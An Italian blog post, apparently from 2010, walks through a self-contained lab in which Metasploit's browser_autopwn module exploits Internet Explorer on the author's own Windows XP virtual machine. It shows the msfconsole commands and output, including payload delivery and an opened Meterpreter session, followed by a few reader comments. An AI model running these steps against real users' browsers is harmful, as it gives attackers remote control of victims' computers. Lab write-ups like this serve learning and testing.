Metasploit da remoto
by admin on Jan.12, 2010, under Hacking, Linux, Sicurezza, Tools
Questo post è dedicato a tutti coloro che si dibattono nel dubbio che tutti i fantastici video che sempre più frequentemente si trovano in rete si riferiscano solamente ad exploit attuabili in una rete locale, e si sentono frustrati nel trattenersi a verificare di persona la cosa, per il timore (perfettamente legittimo) di commettere un reato.
È possibile sperimentare tranquillamente ogni possibile attacco senza recare alcun disturbo a nessuno se si adotta la configurazione che ho usato io, la quale consiste, da un punto di vista harware, in un unico portatile con relativa connessione internet.
Il portatile è dotato di s.o. Debian Linux 5.0, che ospita, attraverso una Sun Virtualbox, un Windows XP SP2. Dato che il Router ADSL che entrambi i sistemi utilizzano per connettersi ad Internet è impostato come bridge, entrambi si connettono tramite distinti collegamenti PPPoE, risultando di fatto tra loro, macchine remote.
Nella fattispecie, l’host Debian Linux ha (attualmente) un indirizzo IP 151.65.45.42, mentre l’host Windows XP ha un indirizzo 151.65.43.87.
Nell’esempio che segue viene fatto uso della solita vulnerabilità a carico del browser web IExplorer di cui è dotato il sistema target.
msf > use server/browser_autopwn
msf auxiliary(browser_autopwn) > set lhost 151.65.45.42
lhost => 151.65.45.42
msf auxiliary(browser_autopwn) > set uripath /
uripath => /
msf auxiliary(browser_autopwn) > db_create autopwn.db
[*] The specified database already exists, connecting
[*] Successfully connected to the database
[*] File: autopwn.db
msf auxiliary(browser_autopwn) > run
[*] Auxiliary module execution completed
msf auxiliary(browser_autopwn) >
[*] Starting exploit modules on host 151.65.45.42…
[...]
[*] Request ‘/’ from 151.65.43.87:2627
[*] Request ‘/?sessid=V2luZG93czpYUDpTUDI6aXQ6eDg2Ok1TSUU6Ni4wO1NQMjo%3d’ from 151.65.43.87:2627
[*] JavaScript Report: Windows:XP:SP2:it:x86:MSIE:6.0;SP2:
[*] Responding with exploits
[*] Sending Internet Explorer COM CreateObject Code Execution exploit HTML to 151.65.43.87:2627…
[*] Sending EXE payload to 151.65.43.87:2627…
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (151.65.45.42:3333 -> 151.65.43.87:2930)
msf auxiliary(browser_autopwn) > sessions -i 1
[*] Starting interaction with 1…
meterpreter > shutdown
Piuttosto chiaro, no?
January 13th, 2010 on 9:59 am
Ciao,
sto tentando il mio primo e timido approccio a questo mondo e avendo anche io delle macchine virtuali che nella mia LAN domestica che posso tranquillamente paciugare volevo proprio iniziare con questo post.
Dato che sono totalmente ignorante in materia quale sarebbe la “solita vulnerabilità a carico del browser web IExplorer di cui è dotato il sistema target.”?
E quale sarebbe la riga nel code che hai postato riguardante?
Scusa le domande ovvie ma da qualche parte vorrei cominciare..
Grazie
January 13th, 2010 on 11:23 am
Ciao, ho usato l’aggettivo “solita” riferendolo alla vulnerabilità citata nel precedente post “Insidie client-side con Metasploit” .
January 14th, 2010 on 10:31 am
grazie, proverò